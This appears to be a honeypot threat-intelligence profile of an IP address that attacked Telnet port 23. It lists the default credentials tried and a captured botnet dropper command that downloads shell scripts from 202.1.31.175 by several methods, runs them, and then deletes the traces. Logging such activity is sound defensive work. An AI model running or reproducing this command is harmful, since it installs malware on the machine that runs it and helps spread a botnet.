Active Threat β€’ LOW

152.42.164.68

First Detection1/12/2026
Last Activity1/12/2026
ISPDIGITALOCEAN-ASN
🎯
17
Total Attacks
πŸ”Œ
1
Ports
πŸ“‘
1
Attack Types
🦠
1
Malware

Geolocation

Country
πŸ‡ΈπŸ‡¬ Singapore
City
Singapore
ASN
AS14061
ISP
DIGITALOCEAN-ASN

Attack Types

cowrie

Attacked Ports

23

Associated Malware

Attempted Credentials

πŸ”root/root
1x
πŸ”root/icatch99
1x
πŸ”admin/admin
1x
πŸ”root/(empty)
1x

Executed Commands

$cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://202.1.31.175/1.sh; curl -O http://202.1.31.175/1.sh; chmod 777 1.sh; sh 1.sh; tftp 202.1.31.175 -c get 1.sh; chmod 777 1.sh; sh 1.sh; tftp -r 3.sh -g 202.1.31.175; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 202.1.31.175 2.sh 2.sh; sh 2.sh; rm -rf 1.sh 1.sh 3.sh 2.sh; rm -rf *1x

Risk Assessment

25
/100
LowMediumHighCritical